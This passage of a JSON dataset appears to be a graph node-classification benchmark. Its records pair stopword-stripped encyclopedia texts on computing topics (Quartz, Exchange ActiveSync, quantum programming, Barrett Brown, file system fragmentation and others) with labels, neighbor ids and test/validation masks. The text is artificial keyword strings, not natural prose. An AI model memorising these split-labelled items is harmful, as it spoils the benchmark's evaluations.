    "text": "Quartz_(graphics_layer):quartz graphics layer apple macos operating system quartz quartz 2d quartz compositor part core graphics framework quartz includes 2d renderer core graphics composition engine sends instructions graphics card vertical nature quartz often synonymous core graphics general sense quartz quartz technologies refer almost every part graphics model rendering layer compositor including core image core video apple graphics technologies use quartz prefix include quartz 2d primary two-dimensional 2d text graphics rendering library directly supports aqua displaying two-dimensional graphics create user interface including on-the-fly rendering anti-aliasing quartz render text sub-pixel precision graphics limited traditional anti-aliasing default mode operation turned mac os x 10.4 tiger apple introduced quartz 2d extreme enabling quartz 2d offload rendering compatible gpus however gpu rendering enabled default due potential video redraw issues kernel panics mac os x v10.5 quartz 2d extreme renamed quartzgl however still remains disabled default situations degrade performance experience visual glitches per-application setting turned developer wishes quartz compositor compositing engine used macos mac os x jaguar later quartz compositor use graphics accelerator gpu vastly improve composition performance technology known quartz extreme enabled automatically systems supported graphics cards widely stated quartz uses pdf internally notably apple 2000 macworld presentation quartz early developer documentation often people making comparisons display postscript technology used nextstep openstep descendant quartz internal imaging model correlates well pdf object graph making easy output pdf multiple devices",
    "neighbors": [
      9732,
      4615,
      1549,
      4111,
      5647,
      1042,
      6700,
      4657,
      1074,
      9784,
      10808,
      576,
      9802,
      5713,
      4178,
      3670,
      4184,
      2141,
      4702,
      2149,
      3691,
      8303,
      6771,
      6264,
      2686,
      7806,
      9343,
      3719,
      10888,
      137,
      11402,
      7307,
      8852,
      1686,
      7318,
      5784,
      4251,
      3228,
      7325,
      2207,
      1699,
      171,
      5292,
      8877,
      1710,
      3248,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      3286,
      4310,
      9430,
      3289,
      4318,
      4836,
      231,
      2282,
      9451,
      4844,
      5356,
      2288,
      10480,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      9999,
      10512,
      4888,
      11037,
      811,
      3371,
      10036,
      7991,
      9529,
      9022,
      1346,
      4933,
      838,
      9035,
      1878,
      9054,
      6495,
      9063,
      4457,
      10602,
      10608,
      6539,
      9100,
      9109,
      1439,
      10658,
      9123,
      8627,
      8120,
      6093,
      7118,
      11223,
      7128,
      3035,
      4571,
      3038,
      4068,
      5093,
      9700,
      487,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 2677,
    "label": 4,
    "text": "Neil_Schwartzman:neil schwartzman neil schwartzman canadian anti-spam activist involved anti-spam efforts since 1995 co-founder executive director cauce sat canadian federal task force spam u.s. federal communications commission csric network abuse protection working group currently chair m3aawg awards committee",
    "neighbors": [
      1681,
      6762,
      2188
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2678,
    "label": 4,
    "text": "NowSecure:nowsecure nowsecure formerly viaforensics chicago-based mobile security company publishes mobile app device security software former ceo co-founder andrew hoog working cio one employees dismissed dismissal hoog tasked reviewing whether employee stolen sensitive data company rather hire forensics firm investigate hoog performed investigation continued forensic work side hoog wife chee-young kim contributed money start company originally known chicago electronic discovery viaforensics hoog devoted full-time mobile forensics kim continued work corporate job day participated business development night weekends march 2011 viaforensics profitable extent could pay employee benefits kim left job went work viaforensics full-time june 5 year viaextract 1.0 released conference myrtle beach viaforensics introduced known vialab march 2013. vialab product allowed automated testing variety security flaws apps including man-in-the-middle attacks ssl strip attacks coding problems opportunities reverse engineering viaforensics subject inc 5000 13 fastest-growing tech company us award 2014 2014 viaforensics launched viaprotect app show users destinations sources data mobile devices rsa conference company began focus similar individual enterprise device protection result focus shift viaforensics decided rebrand nowsecure nowsecure publisher nowsecure forensics formerly viaextract nowsecure lab formerly vialab nowsecure mobile apps formerly viaprotect nowsecure forensics designed law enforcement extract artifacts mobile devices applying deleted data recovery data search nowsecure lab mobile app vulnerability scanning software nowsecure mobile free end-user oriented vulnerability scanner ios android blackphone 2014 2015 pc magazine awarded viaprotect editor choice android privacy utilities",
    "neighbors": [
      2084,
      2437,
      9356,
      9488,
      4063,
      7899,
      10173,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 2679,
    "label": 5,
    "text": "Exchange_ActiveSync:exchange activesync exchange activesync commonly known eas proprietary protocol designed synchronization email contacts calendar tasks notes messaging server smartphone mobile devices protocol also provides mobile device management policy controls protocol based xml mobile device communicates http https originally branded airsync supporting microsoft exchange servers pocket pc devices microsoft licenses technology widely synchronization groupware mobile devices number competing collaboration platforms including addition support windows phone eas client support included beyond premises installations exchange various personal enterprise hosted services microsoft also utilize eas including outlook.com office 365 built-in email application windows 8 desktop mail app also supports protocol apart eas client support included first version eas called airsync time part mobile information server mis 2002 version eas communicated web-based distributed authoring versioning webdav exchange 2000 servers syncing email contacts calendar allowed users select folder list sync email folders contacts calendars initial version eas user ’ device “ pull ” data rather server “ push ” new information soon available eas 2.0 shipped exchange server 2003 version protocol developed microsoft windows mobile team delivered binary drop massync.dll exchange server team eas used webdav connect user mailbox added ability sync non-default calendar contacts folders always date autd implemented way let device know new information short message service sms technology used deliver information device use sms notification configuration sms gateway required account needed configured user mobile phone number exchange server 2003 sp1 ghosting support added eas 2.1 ghosting tells server sync sent changes sent specified fields changed others deleted eas protocol also moved globally unique identifier guid 1 x short ids items reduced amount data sent across wireless network eas 2.5 part exchange server 2003 sp2 first version eas written exchange server team version also introduced direct push real-time push e-mail solution allows server say new item tells client device sync called ping sync global address list gal search added enable people look co-workers company directory find email address ability remotely wipe device also added administrators could remove company data device lost stolen employee left company tasks syncing added s/mime email encryption following policies added eas 12.0 came exchange server 2007 eas 12.0 complete re-write protocol managed code previous version new features included password reset allowed users reset forgotten pin lock code message flagging gave users ability mark message could remember follow got back computer office setting users could set “ away ” message phone sharepoint unc file share access links email file traffic proxied though eas empty deleted items allow people shrink mailboxes ’ exceed mailbox size limits fetch allowed users get parts message choose later get rest message attachment later device info allowed users administrators see phones connected accounts autodiscover although strictly speaking ’ part eas protocol allowed phones automatically configure eas connection user login password instead requiring people know computer name exchange server ability see invited meeting also added well ability search server email synced device new policies introduced eas 12.1 came exchange server 2007 sp1 version protocol one largest changes since version 2.5 featured header compression base64 encoding binary structure decrease amount data sent wirelessly multiple collections sync bundling sync requests together instead previous way sync folder separately hanging sync allowed server keep communications channel open client times battery life data ’ consumed constantly turning radio querying server “ true push sync ” solution far lower message delivery latencies opposed previous ping based “ push pull ” solution confirmation completed remote wipe well following 30 new policies eas 14.0 introduced part exchange server 2010 new version added new conversation view put email messages view connected several attributes including message-id email subject notes syncing ability look availability free/busy status contact calendar nickname cache shared names common used contacts outlook web app owa eas ability set server side rule always move messages conversation lunar calendar support syncing reply state let device server know message forwarded replied source new way identify unified messaging um messages voicemail appeared user ’ inbox could handled differently sms syncing allowed users see sms messages email inbox reply inbox instead phone following two new policies also first version eas identified clients using older versions eas alerted updated version client would enable newer features eas 14.1 came part exchange server 2010 sp1 version protocol added gal photos images stored active directory server user sent email message diffs means sending new portion email avoiding redundant information added device/user information provision command new allow/block/quarantine feature could easily allow administrators control devices connected organizations information rights management irm eas method apply digital rights management control encryption email messages sent received eas 14.1 may allow irm eas eas 16.0 announced june 2015 deployed office 365 first followed exchange server 2016 new protocol version adds mainly 3 enhancements redesigned calendar synchronisation avoid common eas calendar syncing problems added calendar attachments syncing email drafts folder eas 16.1 announced june 2016 deployed office 365 first followed exchange server 2016 version protocol contains three major capabilities improved keyword search propose new time account-only remote wipe beginning early 2000s eas began available licensing time client protocol license motorola first licensee began license 2.1 version eas various organizations licensed eas time microsoft eventually started licensing server side eas 2007 protocol licensing continued 2008 december 2008 microsoft shifted licensing eas protocol license licensing patents eas providing full protocol documentation eas licensed series patents given computer code companies different clients servers implement subset entire features protocol implementations written company obtained license google uses implementation eas g suite subscribers likewise ibm novell implemented technology allow competing groupware servers lotus domino novell groupwise support smartphones devices ibm notes traveler novell data synchronizer mobility pack respectively april 2011 microsoft launched eas logo program tests third-party eas clients mobile email devices handset manufacturers licensed eas protocol microsoft eligible join program order compliant eas clients must employ eas v14.0 later enable following features management policies",
    "neighbors": [
      10242,
      10886,
      2695,
      3847,
      649,
      9868,
      1297,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      2208,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      3246,
      562,
      2996,
      9909,
      1083,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      9408,
      7364,
      2887,
      8265,
      10956,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      479,
      5471,
      5472,
      6367,
      10341,
      10344,
      11112,
      11240,
      9451,
      367,
      8432,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2680,
    "label": 9,
    "text": "Quantum_programming:quantum programming quantum programming process assembling sequences instructions called quantum programs capable running quantum computer quantum programming languages help express quantum algorithms using high-level constructs quantum instruction sets used turn higher level algorithms physical instructions executed quantum processors sometimes instructions specific given hardware platform e.g ion traps superconducting qubits cqasm also known common qasm hardware-agnostic qasm guarantees interoperability quantum compilation simulation tools introduced qca lab tudelft quil instruction set architecture quantum computing first introduced shared quantum/classical memory model introduced robert smith michael curtis william zeng practical quantum instruction set architecture many quantum algorithms including quantum teleportation quantum error correction simulation optimization algorithms require shared memory architecture openqasm intermediate representation introduced ibm use qiskit ibm q experience blackbird quantum instruction set intermediate representation used xanadu strawberry fields designed represent continuous-variable quantum programs run photonic quantum hardware quantum software development kits provide collections tools create manipulate quantum programs also provide means simulate quantum programs prepare run using cloud-based quantum devices following software development kits used run quantum circuits prototype quantum devices well simulators ocean open source suite tools developed d-wave written mostly python programming language enables user formulate problems ising model quadratic unconstrained binary optimization formats qubo results obtained submitting online quantum computer leap d-wave ’ real-time quantum application environment customer-owned machines classical samplers open source project developed institute theoretical physics eth uses python programming language create manipulate quantum circuits results obtained either using simulator sending jobs ibm quantum devices open source project developed ibm quantum circuits created manipulated using python swift java results obtained either using simulators run user device simulators provided ibm prototype quantum devices provided ibm well ability create programs using basic quantum operations higher level algorithms available within qiskit aqua package qiskit based openqasm standard representing quantum circuits support pulse level control quantum systems specified openpulse standard open source project developed rigetti uses python programming language create manipulate quantum circuits results obtained either using simulators prototype quantum devices provided rigetti well ability create programs using basic quantum operations higher level algorithms available within grove package forest based quil instruction set public access quantum devices currently planned following sdks yet implemented project developed microsoft part .net framework quantum programs written run within visual studio vscode open source project developed google uses python programming language create manipulate quantum circuits results obtained using simulators run user device open-source python library developed xanadu designing simulating optimizing continuous variable cv quantum optical circuits three simulators provided one fock basis one using gaussian formulation quantum optics one using tensorflow machine learning library quantum programming environment developed cambridge quantum computing target simulators quantum hardware planned use hardware produced nqit hub well oxford quantum circuits full release expected september 2018 two main groups quantum programming languages imperative quantum programming languages functional quantum programming languages prominent representatives imperative languages qcl lanq q|si quantum computation language qcl one first implemented quantum programming languages important feature qcl support user-defined operators functions syntax resembles syntax c programming language classical data types similar primitive data types c. one combine classical code quantum code program quantum pseudocode proposed e. knill first formalized language description quantum algorithms introduced moreover tightly connected model quantum machine called quantum random access machine qram language developed microsoft used quantum development kit q|si platform embedded .net language supporting quantum programming quantum extension while-language platform includes compiler quantum while-language chain tools simulation quantum computation optimisation quantum circuits termination analysis quantum programs verification quantum programs q language second implemented imperative quantum programming language q language implemented extension c++ programming language provides classes basic quantum operations like qhadamard qfourier qnot qswap derived base class qop new operators defined using c++ class mechanism quantum memory represented class qreg qreg x1 // 1-qubit quantum register initial value 0 qreg x2 2,0 // 2-qubit quantum register initial value 0 computation process executed using provided simulator noisy environments simulated using parameters simulator quantum guarded command language qgcl defined p. zuliani phd thesis based guarded command language created edsger dijkstra described language quantum programs specification quantum macro assembler qmasm low-level language specific quantum annealers d-wave efforts underway develop functional programming languages quantum computing functional programming languages well-suited reasoning programs examples include selinger qpl haskell-like language qml altenkirch grattage higher-order quantum programming languages based lambda calculus proposed van tonder selinger valiron arrighi dowek qfc qpl two closely related quantum programming languages defined peter selinger differ syntax qfc uses flow chart syntax whereas qpl uses textual syntax languages classical control flow operate quantum classical data selinger gives denotational semantics languages category superoperators qml haskell-like quantum programming language altenkirch grattage unlike selinger qpl language takes duplication rather discarding quantum information primitive operation duplication context understood operation maps formula_1 formula_2 confused impossible operation cloning authors claim akin sharing modeled classical languages qml also introduces classical quantum control operators whereas languages rely classical control operational semantics qml given terms quantum circuits denotational semantics presented terms superoperators shown agree operational denotational semantics implemented classically haskell liqui| pronounced liquid quantum simulation extension f programming language currently developed quantum architectures computation group quarc part stationq efforts microsoft research liqui| seeks allow theorists experiment quantum algorithm design physical quantum computers available use includes programming language optimization scheduling algorithms quantum simulators liqui| used translate quantum algorithm written form high-level program low-level machine instructions quantum device quantum lambda calculi extensions classical lambda calculus introduced alonzo church stephen cole kleene 1930s purpose quantum lambda calculi extend quantum programming languages theory higher-order functions first attempt define quantum lambda calculus made philip maymin 1996 lambda-q calculus powerful enough express quantum computation however language efficiently solve np-complete problems therefore appears strictly stronger standard quantum computational models quantum turing machine quantum circuit model therefore maymin lambda-q calculus probably implementable physical device 2003 andré van tonder defined extension lambda calculus suitable proving correctness quantum programs also provided implementation scheme programming language 2004 selinger valiron defined strongly typed lambda calculus quantum computation type system based linear logic quipper published 2013 implemented embedded language using haskell host language reason quantum programs written quipper written haskell using provided libraries example following code implements preparation superposition",
    "neighbors": [
      9345,
      9224,
      6798,
      1051,
      10145,
      3876,
      6182,
      9385,
      7851,
      5677,
      1591,
      10042,
      8514,
      10819,
      8262,
      9926,
      3529,
      74,
      9801,
      7164,
      11209,
      10452,
      5081,
      2781,
      477,
      2273,
      10083,
      8554,
      8430,
      8688,
      3698,
      3573,
      10102,
      2680,
      3323,
      7292
    ],
    "mask": "Test"
  },
  {
    "node_id": 2681,
    "label": 1,
    "text": "Database_application:database application database application computer program whose primary purpose entering retrieving information computerized database early examples database applications accounting systems airline reservations systems sabre developed starting 1957 characteristic modern database applications facilitate simultaneous updates queries multiple users systems 1970s might accomplished user front 3270 terminal mainframe computer mid-1980s becoming common give user personal computer program running pc connected database server information would pulled database transmitted network arranged graphed otherwise formatted program running pc starting mid-1990s became common build database applications web interface rather develop custom software run user pc user would use web browser program every application database application web interface advantage could used devices different sizes different hardware different operating systems examples early database applications web interfaces include amazon.com used oracle relational database management system photo.net online community whose implementation top oracle described book database-backed web sites ziff-davis press may 1997 ebay also running oracle electronic medical records referred emrexperts.com december 2010 software database application 2005 o'reilly book uses term title database applications web complex database applications remain accounting systems sap may contain thousands tables single module many today widely used computer systems database applications example facebook built top mysql etymology phrase database application comes practice dividing computer software systems programs operating system compilers file system tools database management system application programs payroll check processor standard pc running microsoft windows example windows operating system contains systems programs games word processors spreadsheet programs photo editing programs etc would application programs application short application program database application short database application program every program uses database would typically considered database application example many physics experiments e.g. large hadron collider generate massive data sets programs subsequently analyze data sets constitute database though typically managed standard relational database management system computer programs analyze data primarily developed answer hypotheses put information back database therefore overall program would called database application",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      8921,
      9177,
      987,
      860,
      9183,
      11362,
      7523,
      10471,
      8808,
      7022,
      6383,
      5619,
      9079,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 2682,
    "label": 9,
    "text": "Constructed_product_result_analysis:constructed product result analysis field compiler implementation computer science constructed product result analysis cpr analysis static analysis determines functions given program return multiple results efficient manner typically means returning multiple results register opposed returning pointer tuple allocated heap whose components function multiple return values cpr analysis introduced context compiling haskell lazy functional language implemented glasgow haskell compiler may applicable programming languages well",
    "neighbors": [
      1952,
      4769,
      3876,
      230,
      6536,
      9911
    ],
    "mask": "None"
  },
  {
    "node_id": 2683,
    "label": 4,
    "text": "Barrett_Brown:barrett brown barrett lancaster brown born august 14 1981 american journalist essayist satirist founded project pm research collaboration wiki facilitate analysis troves hacked emails leaked information concerning inner workings cyber-military-industrial complex january 2015 brown sentenced 63 months federal prison crimes accessory fact obstruction justice threatening federal officer stemming fbi investigation 2012 stratfor email leak prosecutors previously brought charges associated sharing http link leaked stratfor data charges dropped 2014 part sentence brown also required pay almost 900,000 stratfor prior 2011 brown ties hacktivist collective anonymous brown born dallas texas robert brown karen lancaster later divorced grew dallas exhibited early interest writing journalism creating newspapers family computer attending preston hollow elementary school went contribute school newspapers interned several weekly newspapers teenage years attended episcopal school dallas sophomore year high school spent would-be junior year tanzania father residing business africa brown completed high school online texas tech university program earning college credits well high school diploma 2000 enrolled university texas austin spent two semesters taking writing courses leaving school pursue full-time career freelance writer brown served director communications enlighten vote secularist pac provides financial strategic assistance political candidates advocate strict enforcement establishment clause 2010 brown began work crowdsourced investigation wiki project pm brown written main goals project pm increase positive influence calls capable segments blogosphere reducing negative influence well-regarded mainstream pundits may political agendas compatible public interest aim wiki project pm established way deliberate generation critical mass work following among dependable bloggers manner segments traditional media prompted even forced address critical issues methods means reportage experimental aim project pm also develop communicational schematic could provide bloggers reporters concerned citizen journalist best possible feed raw information produce content aim project pm brown stated institutions structures developed past two decades accelerating public internet use reasonably describe wholesome effect information flow information age work progress thus potential improvements made importantly improvements made initially small number influential participants working coordination purpose project pm implement solutions extent participants collectively able well demonstrate beneficial effects solutions others might spurred recreate even build upon independently efforts june 2011 project pm released exclusive report surveillance contract called romas/coin discovered e-mails hacked hbgary anonymous consisted sophisticated data-mining techniques leveraging mobile software aimed arab countries november 2011 brown said 75 names members zetas drug cartel would released member anonymous group kidnapped set free brown says member released truce drug cartel moment others said kidnapping fake january 18 2012 brown interviewed english language russian news network rt cyber attacks anonymous temporary blackout us government websites whitehouse.gov doj.gov fbi.gov march 6 2012 confirmed twitter fbi raided residence receiving information hector xavier monsegur also known online pseudonym sabu founder lulzsec early january 2014 announced second book begun 2006 published according legal defense website book originally titled hot fat clouded amazing amusing failures america ’ chattering class consisted attack ubiquitous newspaper columnists media pundits argues undeservedly influential able form public opinion … excited announce rescued book fate soon see light day newly titled keep rootin ’ putin establishment pundits twilight american competence text become available ebook spring 2014 donors legal defense fund september 2012 incarceration brown wrote series columns magazine titled barrett brown review arts letters jail 2015 transitioned intercept 2016 intercept national magazine award three barrett columns written daily beast vanity fair true/slant huffington post guardian publications media outlets presented brown spokesperson anonymous label disputes appeared documentaries legion terms conditions may apply hacker wars brown said renounced links group 2011 also reported 2011 brown anon alumnus gregg housh landed six-figure deal amazon book tentatively titled anonymous tales inside accidental cyberwar march 6 2012 fbi executed search warrants brown apartment mother house seeking evidence alleged crimes items seized included records relating hbgary infragard endgame systems anonymous lulzsec irc chats twitter wiki.echelon2.org pastebin.com agents took possession laptop computers suspect fbi working incorrect information brown told reporter september 12 2012 brown arrested dallas county texas threatening fbi agent youtube video arrest occurred left computer linked tinychat raid could heard background brown talked publicly history using heroin going withdrawal day arrest magistrate denied bail therefore kept pre-trial detention danger safety community risk flight september 24 2012 pastebin post appeared titled barrett brown – communiqué prison 9/20/12 brown thanked supporters described insufficient medical treatment received ribs injured arrest acknowledged past mistakes missive concludes personally thank everyone outside helped movement particularly critical time regained freedom nothing lose time war paper always war october 3 2012 federal grand jury indictment returned brown charges threats conspiracy retaliation federal law enforcement officer various tweets youtube uploads comments made brown arrest cited support within indictment later entered plea guilty three counts december 4 2012 brown indicted additional 12 federal charges related december 25 2011 hack austin-based private intelligence company stratfor carried jeremy hammond trove millions stratfor emails hack including authentication information thousands credit card accounts shared hacker collective lulzsec whistleblower site wikileaks main article 2012 stratfor email leak hammond pleaded guilty received maximum sentence ten years federal prison hack brown faced 45 years federal prison allegedly sharing link data part project pm presumed fbi entrapment maneuver attorney jesselyn radack raised connections brown case client peter van buren state department sought prosecute link personal blog wikileaks document two online commentators internet security issues criticized charges brown entered plea guilty twelve counts january 23 2013 third indictment filed brown two counts obstruction concealing evidence march 6 2012 fbi raid mother homes brief court hearing week later judge found mentally competent stand trial brown pleaded guilty additional charges may 1 2013 announced brown retained two attorneys charles swift ahmed ghappour represent legal cases september 4 2013 brown federal court-issued gag order lawyers allowed discuss case media lest taint jury assistant united states attorney candina s. heath lead prosecutor said brown tried manipulate media behind bars benefit brown attorney coordinates and/or approves use media publicity brown contained false information gross fabrications defense counsel maintained gag order unfounded unwarranted breach brown first amendment rights though forbidden write speak case brown continued pen articles prison cell unrelated topics gag order lifted april 23 2014 key documents unsealed brown custody since september 12 2012 mother sentenced november 8 2013 six months probation 1,000 fine misdemeanor charge obstructing execution search warrant better judgment clouded maternal instinct stated court judge said feel parent know best could march 2014 charges brown dropped april 2014 reported brown agreed plea bargain january 2015 brown sentenced 63 months prison also ordered pay 890,250 fines restitution journalist janus kopfstein said believed government considered brown threat suggested prosecutors made false allegations used increase length sentence supporting theory much brown december sentencing hearing spent drawn-out arguments definitions project pm brown brown released prison november 29 2016 moved halfway house five drug dealers close downtown dallas texas april 27 2017 brown arrested held unknown charges four days released gave interview democracy house arrest despite pressure government speak media brown expressed desire move iceland germany possible telling truthout interview ca n't stay us ca n't get work done 'm always subject little gusts bureaucracy wo n't another year 'm probation another two years generally goes one year n't act year 'll position leave 2017 lawyers donors brown legal fund filed suit assistant united states attorney candina heath filing subpoena wepay resulted divulgence identities lawyers argued irrelevance donor information case brown provision information directly special agent robert smith federal bureau investigation rather prosecutor judge trial led donors belief information intended surveil harass donors activity protected u.s. constitution filed destruction data monetary damages october 2 2017 judge maria elena james denied motion dismiss case introduced department justice sentencing statement brown alleged despite denial subpoena judge making statement identities contributors echelon2.org public wiki obtained means dozens people given time expertise hailed journalists advocacy groups crucial journalistic enterprise risk indicted sort spurious charges facing long ago government exposed decades prison time copying pasting link publicly available file journalists also linking without prosecuted relatively free documentary film released 2016 field vision brown drive across texas halfway house released prison barrett brown case included plot point season 2 u.s. tv series house cards brown serves advisory board international modern media institute",
    "neighbors": [
      9240,
      4956,
      10950
    ],
    "mask": "Test"
  },
  {
    "node_id": 2684,
    "label": 2,
    "text": "Maliit:maliit maliit input method framework computers particular focus implementing virtual keyboards designed mostly touchscreen devices maliit allows inputting text without presence physical keyboard advanced features word correction prediction also available originating part meego maliit free software licensed lgpl maliit deployed standard component nokia n9 kde plasma active luneos olpc devices ubuntu touch maliit originally developed part meego nokia eventually shipped part meego handset “ day 1 ” software platform meego project ended maliit transferred independent project free software consulting firm openismus first formally independent release 0.80.0 maliit 0.99 released switched qt 4 qt 5 among maliit ’ features plugin-based architecture word correction prediction multitouch context sensitive layouts running linux kernel handling input hardware relies evdev maliit adopted x11 well wayland",
    "neighbors": [
      1728,
      737,
      8326,
      4365,
      6797,
      7983,
      9262,
      10259,
      1972,
      5397,
      5492,
      11221
    ],
    "mask": "Test"
  },
  {
    "node_id": 2685,
    "label": 2,
    "text": "Grapple_(network_layer):grapple network layer grapple free software package adding multiplayer support computer games applications uses internet protocols supporting tcp/ip udp/ip intended simple enough multiplayer features added game little dozen lines code also offers advanced features desired grapple takes care creating monitoring closing connections server supports multiple servers message-oriented system clients servers message queue also relay messages client client also provides fully functional lobby system package created 2006 michael simms linux game publishing released gnu lgpl features grapple supports time",
    "neighbors": [
      11069,
      10924,
      6797,
      7214,
      7983,
      11602,
      2804,
      11413,
      6966,
      5531,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2686,
    "label": 2,
    "text": "IFund:ifund ifund us 200 million capital fund developers may enter equity deals creation applications services components apple inc. iphone ipod touch ipad platform offered managed venture capital company kleiner perkins caufield byers kpcb ifund announced kpcb partner john doerr time iphone os sdk apple iphone roadmap event march 6 2008 cupertino california ifund managed kpcb partner matt murphy collaboration partners chi-hua chien john doerr bill joy randy komisar ellen pao ted schlein apple provides kpcb market insight support march 31 2010 kpcb announced fund doubled september 15 2008 kpcb launched blog share perspectives ifund december 2008 confidential ifund application data accidentally published web kleiner perkins caufield byers ’ former hosting provider meteora technologies group database dump file file indexed google coincidentally discovered fruux staffer file contained applications 588 companies including detailed information companies like founder bios financial ratios business models",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      5733,
      8806,
      3691,
      2673,
      2676,
      6264,
      7292,
      7806,
      6783,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      7415,
      8441,
      7420,
      2819,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      6424,
      1316,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 2687,
    "label": 6,
    "text": "File_system_fragmentation:file system fragmentation computing file system fragmentation sometimes called file system aging tendency file system lay contents files non-continuously allow in-place modification contents special case data fragmentation file system fragmentation increases disk head movement seek time applies known hinder throughput addition file systems sustain unlimited fragmentation correction existing fragmentation reorganize files free space back contiguous areas process called defragmentation modern computers ssd disks rotate really discs conventional sense file system fragmentation n't much performance problem fixed movement heads discs fact overly defragmenting drives slowly shorten life-span file system first initialized partition contains small internal structures otherwise one contiguous block empty space means file system able place newly created files anywhere partition time creation files laid near-optimally operating system applications installed archives unpacked separate files end occurring sequentially related files positioned close existing files deleted truncated new regions free space created existing files appended often impossible resume write exactly file used end another file may already allocated thus new fragment allocated time goes factors continuously present free space well frequently appended files tend fragment shorter regions free space also mean file system longer able allocate new files contiguously break fragments especially true file system becomes full large contiguous regions free space unavailable following example simplification otherwise complicated subject consider following scenario new disk five files named b c e saved continuously sequentially order file using 10 blocks space block size unimportant remainder disk space one free block thus additional files created saved file e. file b deleted second region ten blocks free space created disk becomes fragmented empty space simply left marked available later use used needed file system could defragment disk immediately deletion would incur severe performance penalty unpredictable times new file called f requires seven blocks space placed first seven blocks newly freed space formerly holding file b three blocks following remain available another new file called g needs three blocks added could occupy space f c. subsequently f needs expanded since space immediately following occupied three options file system second option probably impractical performance reasons third file large third option impossible single contiguous free space large enough hold new file thus usual practice simply create extent somewhere else chain new extent onto old one material added end file f would part extent much material room available last extent another extent would created eventually file system free segments many places files may spread many extents access time files files may become excessively long early file systems unable fragment files one example acorn dfs file system used bbc micro due inability fragment files error message ca n't extend would times appear user would often unable save file even disk adequate space dfs used simple disk structure files disk located length starting sector meant files exist continuous block sectors fragmentation possible using example table attempt expand file f step five would failed system ca n't extend error message regardless much free space might remain disk total available extend data file standards error handling time primitive case programs squeezed limited memory bbc micro could rarely afford waste space attempting handle errors gracefully instead user would find dumped back command prompt ca n't extend message data yet appended file would lost problem could solved simply checking free space disk beforehand either free space disk may exist size largest contiguous block free space immediately apparent without analyzing numbers presented disk catalog would escape user notice addition almost dfs users previously used cassette file storage suffer error upgrade floppy disk system expensive upgrade shock upgrade might without warning cause data loss file system fragmentation may occur several levels individual file fragmentation occurs single file broken multiple pieces called extents extent-based file systems disk file systems attempt keep individual files contiguous often possible without significant performance penalties file system check defragmentation tools typically account file fragmentation fragmentation percentage statistic free unallocated space fragmentation occurs several unused areas file system new files metadata written unwanted free space fragmentation generally caused deletion truncation files file systems may also intentionally insert fragments bubbles free space order facilitate extending nearby files see preventing fragmentation file segmentation also called related-file fragmentation application-level file fragmentation refers lack locality reference within storing medium related files see file sequence detail unlike previous two types fragmentation file scattering much vague concept heavily depends access pattern specific applications also makes objectively measuring estimating difficult however arguably critical type fragmentation studies found frequently accessed files tend small compared available disk throughput per second avoid related file fragmentation improve locality reference case called file contiguity assumptions active observations operation applications made frequent assumption made worthwhile keep smaller files within single directory together lay natural file system order often reasonable assumption always hold example application might read several different files perhaps different directories exactly order written thus file system simply orders writes successively might work faster given application file system fragmentation problematic consumer-grade hard disk drives increasing disparity sequential access speed rotational latency lesser extent seek time file systems usually placed thus fragmentation important problem file system research design containment fragmentation depends on-disk format file system also heavily implementation file system fragmentation less performance impact upon solid-state drives mechanical seek time involved however file system needs store one additional piece metadata corresponding file piece metadata occupies space requires processing power processor time maximum fragmentation limit reached write requests fail simple file system benchmarks fragmentation factor often omitted realistic aging fragmentation difficult model rather simplicity comparison file system benchmarks often run empty file systems thus results may vary heavily real-life access patterns several techniques developed fight fragmentation usually classified two categories preemptive retroactive due difficulty predicting access patterns techniques often heuristic nature may degrade performance unexpected workloads preemptive techniques attempt keep fragmentation minimum time data written disk simplest appending data existing fragment place possible instead allocating new blocks new fragment many today file systems attempt preallocate longer chunks chunks different free space fragments called extents files actively appended largely avoids file fragmentation several files concurrently appended thus avoiding becoming excessively intertwined final size file subject modification known storage entire file may preallocated example microsoft windows swap file page file resized dynamically normal operation therefore become highly fragmented prevented specifying page file minimum maximum sizes effectively preallocating entire file bittorrent peer-to-peer filesharing applications limit fragmentation preallocating full space needed file initiating downloads relatively recent technique delayed allocation xfs hfs+ zfs technique also called allocate-on-flush reiser4 ext4 file system written file system blocks reserved locations specific files laid yet later file system forced flush changes result memory pressure transaction commit allocator much better knowledge files characteristics file systems approach try flush files single directory contiguously assuming multiple reads single directory common locality reference improved reiser4 also orders layout files according directory hash table files accessed natural file system order dictated readdir always read sequentially retroactive techniques attempt reduce fragmentation negative effects fragmentation occurred many file systems provide defragmentation tools attempt reorder 